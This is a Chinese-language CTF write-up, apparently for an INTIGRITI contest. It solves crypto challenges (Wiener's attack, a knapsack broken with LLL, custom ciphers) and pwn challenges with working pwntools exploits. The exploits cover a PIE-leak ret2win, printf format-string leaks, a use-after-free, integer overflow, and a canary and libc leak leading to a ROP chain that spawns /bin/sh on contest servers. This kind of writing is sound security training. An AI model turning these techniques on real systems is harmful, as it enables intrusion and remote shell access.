外国小比赛,作了一部分
crypto
ReallySecureApparently
只给了n,e和一个文件,猜是c,e几乎和n一样长,猜是winer攻击
n = 689061037339483636851744871564868379980061151991904073814057216873412583484720768694905841053416938972235588548525570270575285633894975913717130070544407480547826227398039831409929129742007101671851757453656032161443946817685708282221883187089692065998793742064551244403369599965441075497085384181772038720949
e = 98161001623245946455371459972270637048947096740867123960987426843075734419854169415217693040603943985614577854750928453684840929755254248201161248375350238628917413291201125030514500977409961838501076015838508082749034318410808298025858181711613372870289482890074072555265382600388541381732534018133370862587
#c = bytes_to_long(open('ciphertext','rb').read())
c = 441001510077083440712098978980133930415086107290453312932779721137710693129669898774537962879522006041519477907847531444975796042514212299155087533072902229706427765901890350700252954929903001909850453303487994374982644931473474420223319182460327997419996588889034403777436157228265528747769729921745312710652
from Crypto.Util.number import long_to_bytes,bytes_to_long
def transform(x,y):
res = []
while y:
res.append(x//y)
x,y = y,x%y
return res
def continued_fraction(res):
numerator,denominator = 1,0
for i in res[::-1]:
denominator,numerator = numerator,i*numerator+denominator
return numerator,denominator
def wiener_attack(c,res,n):
print("Attack start...")
for i in range(1,len(res)):
ress = res[:i]
d = continued_fraction(ress)[1]
m = long_to_bytes(int(pow(c,d,n)))
#if all(0x20<=k<=0x7f for k in m):
if b'{' in m and b'}' in m:
print(m)
res = transform(e,n)
wiener_attack(c,res,n)
#INTIGRITI{0r_n07_50_53cur3_m4yb3}Keyless
通过+,*,^进行的加密,次数比一般题多点
def encrypt(message):
encrypted_message = ""
for char in message:
a = (ord(char) * 2) + 10
b = (a ^ 42) + 5
c = (b * 3) - 7
encrypted_char = c ^ 23
encrypted_message += chr(encrypted_char)
return encrypted_message
flag = "INTIGRITI{REDACTED}"
encrypted_flag = encrypt(flag)
with open("flag.txt.enc", "w") as file:
file.write(encrypted_flag)d = [((enc[i]&0x1f)<<6)+(enc[i+1]&0x3f) for i in range(0,len(enc),2)]
b = [(((((i^23)+7)//3 - 5)^42) - 10)//2 for i in d]
bytes(b)
#INTIGRITI{m4yb3_4_k3y_w0uld_b3_b3773r_4f73r_4ll}Not So Smooth
a,b未知,但运算时只需要pow(u,n,p)所以不必求出a,b
from Crypto.Util.number import long_to_bytes
from Crypto.Util.strxor import strxor
from random import randint
from flag import FLAG
def f(x, n):
return (pow(u,n,p)*x + v*(1-pow(u,n,p))*pow(1-u, -1, p)) % p
p = 97201997431130462639713476119411091922677381239967611061717766639853376871260165905989218335681560177626304205941143288128749532327607316527719299945637260643711897738116821179208534292854942631428531228316344113303402450588666012800739695018334321748049518585617428717505851025279186520225325765864212731597
u = 14011530787746260724685809284106528245188320623672333581950055679051366424425259006994945665868546765648275822501035229606171697373122374288934559593175958252416643298136731105775907857798815936190074350794406666922357841091849449562922724459876362600203284195621546769313749721476449207319566681142955460891977927184371401451946649848065952527323468939007868874410618846898618148752279316070498097254384228565132693552949206926391461108714034141321700284318834819732949544823937032615318011463993204345644038210938407875147446570896826729265366024224612406740371824999201173579640264979086368843819069035017648357042
v = 16560637729264127314502582188855146263038095275553321912067588804088156431664370603746929023264744622682435376065011098909463163865218610904571775751705336266271206718700427773757241393847274601309127403955317959981271158685681135990095066557078560050980575698278958401980987514566688310172721963092100285717921465575782434632190913355536291988686994429739581469633462010143996998589435537178075521590880467628369030177392034117774853431604525531066071844562073814187461299329339694285509725214674761990940902460186665127466202741989052293452290042871514149972640901432877318075354158973805495004367245286709191395753
w = 30714296289538837760400431621661767909419746909959905820574067592409316977551664652203146506867115455464665524418603262821119202980897986798059489126166547078057148348119365709992892615014626003313040730934533283339617856938614948620116906770806796378275546490794161777851252745862081462799572448648587153412425374338967601487603800379070501278705056791472269999767679535887678042527423534392867454254712641029797659150392148648565421400107500607994226410206105774620083214215531253544274444448346065590895353139670885420838370607181375842930315910289979440845957719622069769102831263579510660283634808483329218819353
a = randint(0, 2**2048)
b = randint(0, 2**2048)
A = f(w, a)
B = f(w, b)
key = long_to_bytes(f(B, a))[:len(FLAG)]
enc = strxor(FLAG, key)
print(f"{A = }")
print(f"{B = }")
print(f"{enc = }")
A = 7393401480034113709683683682039780458211722756040975666277858366986963864147091724359492764726999692812421940595309756560491142512219957986281425163574890752574157617546760386852366936945888357800966704941013951530688031419816817272581287237223765833452303447283089906937413964658335387593899889933721262202
B = 6919381992041136573008188094979879971060160509085428532054694712745921654244468113796582501225839242977870949915769181804595896718922228206397860738237256125972615830799470450058633231003927061049289907097099916321068776956652172887225970642896455423957706532253349472544176183473470843719479781727784095989
enc = b'\xcfW\x85\x8d\xedU\xdd\xd9`\x16f\xb8j(\xeb9-\x1b\xb8\x18 0av\xe5\xabK\xc6'
'''
k k y
(pow(u,n,p)*x + v*(1-pow(u,n,p))*pow(1-u, -1, p)) % p
(k*x + v*(1-k)*y) % p
(kx + vy*(1-k)) % p
kx + vy - vyk = k(x-vy)+vy %p
'''
y = pow(1-u, -1, p)
k1 = (A - v*y )*pow(w-v*y, -1, p) %p #k1 = pow(u,a,p)
#f(B,a)
fba = (k1 * B + v*(1-k1)*y) %p
xor(enc, long_to_bytes(fba)[:len(enc)])
#INTIGRITI{1e863724be1ea6d3e}1-10
背包加密
from random import randint
from re import search
from flag import FLAG
cs = [randint(0, 2**1000) for _ in range(10)]
xs = [randint(0, 2**64) for _ in range(10)]
xs = [ord(f) + i - (i%1000) for i, f in zip(xs, search("{(.*)}", FLAG).group(1))]
print(f"{cs = }")
print(f"s = {sum(c*x for c, x in zip(cs, xs))}")
cs = [8508903290440008966939565321248693758153261635170177499193552423579929500027826696702216711413627480472568726828904707392607240309148374882044455682656477650413559779578913981575195542381602155806438946382809049847521263107908111429547314575039079118614485792613461747911710760754291582134293099750060, 10234293217173095983648586990138462404689872504690765936890158736280331352728086141006820545673419953576281340699793983414878095413526583845311613647542879798224462254801103246845064675391113534349390649562211376117941776588135441368773636568930887968431002105334751994385414474789708434897717472259757, 6001064586644974650131784742218587067958465984737568290249286706923485137083921908971767187010824715217158349948368322929900720010489749231105336650564421771867089333709608235963711368415685056362117910529113580811922176651335662802405504434103542105450330213217418470901029864459362153866361049469621, 5859510800336462649673113647904370677448984650623412649303149431740483580968255760095323745895405406649271411277663981671465673293279417168147656423009231087547991428322779036740050269460373254323377738756038706795196225547099530503996157675637620918729310987613041873955654973230573780794437230183289, 8212120161226957435594246142362544687871307206030517377713172267061914524817671684448986080347503212333314134144272096534190656954277299391948626024244379808998220515649968150824587976113971840005858079163744362874678111323034234960076591622752217194796532407435861854992608669653483268713825154541681, 4292538496747452556903766205458518557016170261915268175117554973221631407580344459540989898488936014316805799620957521118332103032738032797936315597220903773140347787977387271254963436603728977128756213671653297994336981775219965231686927050793105808729293803455246360077380768093287937551667515822737, 8583458084429417950887051233123781099671792568724013361916924355046040863544385972858215904752358387759143712618915109914726815547284050405347634520790328222420443989299783668017365846692013464579110450651166600940834254189911732107856656458621485902792541383514622551498513045029193930072821693821256, 927938350277846540058170699346614173130036388369329189433895716040551556863284640834396837739290832786836335265440745786025530973467859153202044442045287145528583412999497854136387626360287750242048999254798532603013016406637079389023297629455299864761196574249382738851682248453939600976884575974199, 4606866838328488359534883828872534448488908284003992208192170511899852596906485417934690617926601159129473558885893097400239110669875450476234618534668886892219546199419412794765402627731086862572263105282498567494065303352715044800789544479262215220148659740517187562922289802434925672447697743660640, 5696622808956926263797513675882969816326582766528835713485415099018508834817057303528828064039948371652175876967703746446602159940653502950606513683435185458750394450192106019388424601807240033502531431423705043713657847236861816929000927218441444067742560786753091009546483807078198791541719979069795]
s = 605466527953516222016485516214431809590993588699320208021845670703468281059947406248463347211427615855012720451029976981068579151311047123161756448068506197424807516350675172131826275005312472029312861168498961728971558322943730466676859739724928104907194812943584226111451426124864722285484117269190235012612078303171378
M = matrix(ZZ, 11,11)
for i in range(10):
M[i,-1] = cs[i]
M[i,i] = 1
M[-1,-1] = -s
v = M.LLL()[0]
bytes([v%1000 for i in v[:-1]])
#3a8a32c7f6
#INTIGRITI{3a8a32c7f6}PWN
hidden
PIE打开,但通过溢出到ret通过修改ret_main最后一字节可以实现返回并取得加载地址。然后再执行时溢出到后门。
__int64 input()
{
__int64 buf[6]; // [rsp+0h] [rbp-40h] BYREF
__int16 v2; // [rsp+30h] [rbp-10h]
memset(buf, 0, sizeof(buf));
v2 = 0;
puts("Tell me something:");
read(0, buf, 0x50uLL);
printf("I remember what you said: ");
puts((const char *)buf);
return 0LL;
}from pwn import *
#p = process('./hidden')
p = remote('hidden.ctf.intigriti.io', 1337)
context(arch='amd64', log_level='debug')
p.sendafter(b"Tell me something:\n", b'A'*0x48+p8(0x59))
p.recvuntil(b'A'*0x48)
elf_base = u64(p.recv(6).ljust(8, b'\x00')) - 0x1359
backdoor = elf_base + 0x11D9
p.sendafter(b"Tell me something:\n", b'A'*0x48+p64(backdoor))
p.interactive()
#INTIGRITI{h1dd3n_r3T2W1n_G00_BrrRR}
Floor Mat Store
flag已经读入并且有指针,输入6的时候有printf漏洞,直接打出flag
s[0] = "1. Cozy Carpet Mat - $10";
s[1] = "2. Wooden Plank Mat - $15";
s[2] = "3. Fuzzy Shag Mat - $20";
s[3] = "4. Rubberized Mat - $12";
s[4] = "5. Luxury Velvet Mat - $25";
s[5] = "6. Mysterious Flag Mat - $1337";
v8 = v11;
rgid = getegid();
setresgid(rgid, rgid, rgid);
stream = fopen("flag.txt", "r");
if ( !stream )
{
puts("You have a flag.txt, right??");
exit(0);
}
puts(
"Welcome to the Floor Mat store! It's kind of like heaven.. for mats.\n"
"\n"
"Please choose from our currently available floor mats\n"
"\n"
"Note: Out of stock items have been temporarily delisted\n");
puts("Please select a floor mat:\n");
for ( i = 0; i <= 4; ++i )
puts(s[i]);
puts("\nEnter your choice:");
__isoc99_scanf("%d", &v4);
if ( v4 <= 0 || v4 > 6 )
{
puts("Invalid choice!\n");
exit(1);
}
v7 = v4 - 1;
while ( getchar() != 10 )
;
if ( v7 == 5 )
fgets(v11, 64, stream);
puts("\nPlease enter your shipping address:");
fgets(format, 128, stdin);
puts("\nYour floor mat will be shipped to:\n");
printf(format);
return 0;
}┌──(kali㉿kali)-[~/ctf/1118]
└─$ nc floormats.ctf.intigriti.io 1337
Welcome to the Floor Mat store! It's kind of like heaven.. for mats.Please choose from our currently available floor mats
Note: Out of stock items have been temporarily delisted
Please select a floor mat:
1. Cozy Carpet Mat - $10
2. Wooden Plank Mat - $15
3. Fuzzy Shag Mat - $20
4. Rubberized Mat - $12
5. Luxury Velvet Mat - $25Enter your choice:
6Please enter your shipping address:
%10$sYour floor mat will be shipped to:
INTIGRITI{50_7h475_why_7h3y_w4rn_4b0u7_pr1n7f}
Maltigriti
给了很长的代码,在free时有个uaf,而且给了后门
// pwn/maltigriti
// by c0nrad - Sloppy Joe Pirates
// Enjoy <3
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
const char STATUS_ACCEPTED = 'A';
const char STATUS_REJECTED = 'R';
const char STATUS_DUPLICATE = 'D';
struct User {
char name[32];
char password[32];
int bio_length;
char *bio;
};
struct Report {
struct User *user;
char status;
long bounty;
char title[32];
char body[128];
struct Report *next;
};
void print_reports(struct Report *report) {
int counter = 1;
while (report != NULL) {
printf("--- Report #%d ---\n", counter++);
printf("Title: %s\n", report->title);
printf("Body: %s\n", report->body);
if (report->status == STATUS_ACCEPTED) {
printf("Status: Accepted\n");
} else if (report->status == STATUS_REJECTED) {
printf("Status: Rejected\n");
} else if (report->status == STATUS_DUPLICATE) {
printf("Status: Duplicate\n");
} else {
printf("Status: Unknown\n");
}
printf("Bounty: %ld\n", report->bounty);
report = report->next;
}
}
void setup() {
setvbuf(stdin, (char *)0x0, 2, 0);
setvbuf(stdout, (char *)0x0, 2, 0);
setvbuf(stderr, (char *)0x0, 2, 0);
}
void menu() {
puts("\n\n--- Welcome to maltigriti's bug bounty reporting system! ---");
puts("0. Register User");
puts("1. Edit User");
puts("2. Submit a bug report");
puts("3. Print Reports");
puts("4. Print Balance");
puts("5. Buy Swag Pack");
puts("6. Logout");
puts("7. Exit");
printf("menu> ");
}
void edit_user(struct User *user) {
if (user != 0 && user->bio != NULL) {
printf("Your current bio is: %s\n", user->bio); //leak
printf("Enter your new bio> ");
fgets(user->bio, user->bio_length, stdin);
} else {
puts("You don't have a bio yet!");
printf("How long is your bio> ");
scanf("%d", &user->bio_length);
getchar();
user->bio = malloc(user->bio_length);
printf("Enter your new bio> ");
fgets(user->bio, user->bio_length, stdin);
}
}
void logout(struct User *user) {
if (user != NULL) {
memset(user->name, 0, 32);
memset(user->password, 0, 32);
memset(user->bio, 0, user->bio_length);
free(user->bio);
}
}
int calculate_balance(struct Report *report, struct User *user) {
int balance = 0;
while (report != NULL) {
if (report->status == STATUS_ACCEPTED && report->user == user) {
balance += report->bounty;
}
report = report->next;
}
printf("Your balance is: %d\n", balance);
return balance;
}
void buy_swag_pack(struct Report *report, struct User *user) {
if (calculate_balance(report, user) >= 1337) {
puts("You have enough money to buy a swag pack!");
puts("With great swag comes great responsibility.");
puts("Here is your swag pack: flag{redacted_redacted}");
exit(0);
} else {
puts("You don't have enough money to buy a swag pack!");
puts("Keep submitting bug reports and maybe you'll get there one day!");
puts(":evil_grin:");
}
}
struct User *register_user() {
struct User *user = malloc(sizeof(struct User));
printf("Enter your name> ");
fgets(user->name, 32, stdin);
printf("Enter your password> ");
fgets(user->password, 32, stdin);
edit_user(user);
return user;
}
struct Report *new_report(struct Report *firstReport, struct User *user) {
struct Report *report = malloc(sizeof(struct Report));
if (firstReport != NULL) {
// get last report
struct Report *scanner = firstReport;
while (scanner->next != NULL) {
scanner = scanner->next;
}
scanner->next = report;
} else {
firstReport = report;
}
report->user = user;
printf("Enter your report title> ");
fgets(report->title, 32, stdin);
printf("Please enter the content of your report> ");
fgets(report->body, 128, stdin);
// Automatically mark the status as duplicate so we don't have to pay anyone :evil_grin:
report->status = STATUS_DUPLICATE;
report->bounty = 0;
puts("Thank you for submitting your bug report!");
puts("Unfortunately our records indicate that this bug has already been submitted!");
puts("Report will be closed and marked as duplicate.");
puts("Hope you didn't spend too much time on it! ( ͡° ͜ʖ ͡°) ");
return firstReport;
}
int main() {
struct Report *reports = 0;
struct User *user = 0;
int report_count = 0;
int menu_choice = 0;
setup();
while (1) {
menu();
scanf("%d", &menu_choice);
getchar();
switch (menu_choice) {
case 0:
user = register_user();
break;
case 1:
edit_user(user);
break;
case 2:
reports = new_report(reports, user);
break;
case 3:
print_reports(reports);
break;
case 4:
calculate_balance(reports, user);
break;
case 5:
buy_swag_pack(reports, user);
break;
case 6:
logout(user);
break;
case 7:
exit(0);
break;
default:
puts("Invalid choice!");
break;
}
}
}
from pwn import *
#p = process('./maltigriti')
p = remote('maltigriti.ctf.intigriti.io', 1337)
context(arch='amd64', log_level='debug')
def add_user():
p.sendlineafter(b"menu> ", b'0')
p.sendlineafter(b"Enter your name> ", b'AAA')
p.sendlineafter(b"Enter your password> ", b'AAA')
def add_bio(bio):
p.sendlineafter(b"How long is your bio> ", str(0xc8).encode()) #bio == report
p.sendlineafter(b"Enter your new bio> ", bio)
def edit_user():
p.sendlineafter(b"menu> ", b'1')
p.recvuntil(b"Your current bio is: ")
ptr = u64(p.recvline()[:-1].ljust(8,b'\x00'))
p.sendlineafter(b"Enter your new bio> ", p64(ptr)+ b'A'+ b'\x00'*7 + p32(2337))
def free_user():
p.sendlineafter(b"menu> ", b'6')
def add_report():
p.sendlineafter(b"menu> ", b'2')
p.sendlineafter(b"Enter your report title> ", b'A')
p.sendlineafter(b"Please enter the content of your report> ", b'A')
def door():
p.sendlineafter(b"menu> ", b'5')
add_user()
add_bio(b'A')
free_user()
add_report()
edit_user()
door()
#gdb.attach(p)
#pause()
p.interactive()
#INTIGRITI{u53_4f73r_fr33_50und5_600d_70_m3}
Over The Edge
头回见python的pwn,要求输入一个64位数,由于使用了定长数字,这也是会溢出的。
import numpy as np
import warnings
import socket, sys
import threading
warnings.filterwarnings("ignore", category=RuntimeWarning)
warnings.filterwarnings("ignore", category=DeprecationWarning)
def process_input(input_value):
num1 = np.array([0], dtype=np.uint64)
num2 = np.array([0], dtype=np.uint64)
num2[0] = 0
a = input_value
if a < 0:
return "Exiting..."
num1[0] = (a + 65)
if (num2[0] - num1[0]) == 1337:
return 'You won!\n'
return 'Try again.\n'
def handle_client(client_socket, client_address):
try:
print(f"Accepted connection from {client_address}")
client_socket.send(b"Time to jump over the edge!\n")
client_socket.send(b"")
while True:
input_data = client_socket.recv(1024).decode().strip()
if not input_data:
break
input_value = int(input_data)
response = process_input(input_value)
if response == 'You won!\n':
with open("flag", "r") as flag_file:
flag_content = flag_file.read()
client_socket.send(flag_content.encode())
client_socket.close()
break
else:
client_socket.send(response.encode())
client_socket.close()
print(f"Connection from {client_address} closed")
except:
client_socket.close()
def main():
host = '0.0.0.0'
port = 1337
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind((host, port))
server_socket.listen()
print(f"Listening on {host}:{port}")
while True:
client_socket, client_address = server_socket.accept()
client_thread = threading.Thread(target=handle_client, args=(client_socket, client_address))
client_thread.start()
if __name__ == "__main__":
main()
┌──(kali㉿kali)-[~/ctf/1118]
└─$ nc edge2.ctf.intigriti.io 1337
Time to jump over the edge!
18446744073709550214
INTIGRITI{fUn_w1th_1nt3g3r_0v3rfl0w_11} Reading in the Dark
要求输入定制的串,并可以printf,这样可以得到想要的地址,然后利用这个给出的时间作个整型溢出进入admin_read溢出写rop
void __fastcall __noreturn menu(char *a1)
{
unsigned int current_time; // eax
int v2; // [rsp+1Ch] [rbp-24h]
while ( 1 )
{
while ( 1 )
{
do
{
while ( 1 )
{
printf("> ");
fgets(a1, 256, stdin);
if ( !validate_data(a1) ) // 4个|且头尾都是|
{
puts("Invalid data...");
exit(1);
}
v2 = parse_function(a1);
if ( v2 != 4 )
break;
if ( !(unsigned __int8)validate_timestamp(a1) )
goto LABEL_18;
admin_read(a1);
}
}
while ( v2 > 4 );
if ( v2 != 3 )
break;
if ( (unsigned __int8)validate_timestamp(a1) )
read_in_the_dark();
else
LABEL_18:
puts("Invalid Timestamp.");
}
if ( v2 == 1 )
{
current_time = get_current_time();
fprintf(_bss_start, "%d\n", current_time);
}
else if ( v2 == 2 )
{
if ( !(unsigned __int8)validate_timestamp(a1) )
goto LABEL_18;
echo(a1);
}
}
}#from ctypes import *
from pwn import *
#clibc = cdll.LoadLibrary("./libc.so.6")
context(arch='amd64', log_level='debug')
elf = ELF('./ritd')
libc = ELF('./libc6_2.35-0ubuntu3.1_amd64.so')
#p = process('./ritd')
p = remote('ritd.ctf.intigriti.io', 1337)
#gdb.attach(p, "b*0x555555555892\nc")
#gettime
pay = b'|1|1||'
p.sendlineafter(b">", pay)
p.recvline()
v = int(p.recvline()) + 0x100000000
#v = clibc.time(0)
pay = f'|{v:10d}|4%75$p,%76$p,%77$p,%143$p,||' #{clibc.time(0):10d}
print(pay)
p.sendlineafter(b">", pay)
p.recvuntil(b'4')
canary = int(p.recvuntil(b',', drop=True),16)
stack = int(p.recvuntil(b',', drop=True),16) - 0x50
elf.address = int(p.recvuntil(b',', drop=True),16) - 0x1a45
libc.address = int(p.recvuntil(b',', drop=True),16) - 128 - libc.sym['__libc_start_main']
print(f"{canary = :x} {stack = :x} {elf.address = :x} {libc.address = :x}")
pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
bin_sh = next(libc.search(b'/bin/sh\x00'))
leave_ret = elf.address + 0x17c2
p.sendlineafter(b"In order to read, you must write. Where would you like to write? (give hex address without 0x)\n", f"{stack:x}".encode())
p.sendlineafter(b"Now what byte would u like to write there?\n", b'0')
p.sendafter(b"Did you read what you wanted to read?\n", flat(0, pop_rdi+1, pop_rdi, bin_sh, libc.sym['system'],canary, stack-0x30, leave_ret)[1:])
#gdb.attach(p)
#pause()
p.interactive()
'''
0x00007fffffffdcb8│+0x0228: 0x90f6c47616335500 <------ 75 canary
0x00007fffffffdcc0│+0x0230: 0x00007fffffffdd10 → 0x00007fffffffde30 ← $rbp <-------- 76
0x00007fffffffdcc8│+0x0238: 0x0000555555555a45 → <menu+154> mov DWORD PTR [rbp-0x24], eax <------- 77 elf
0x00007fffffffded8│+0x0448: 0x00007ffff7c29e40 → <__libc_start_main+128> <-------
'''
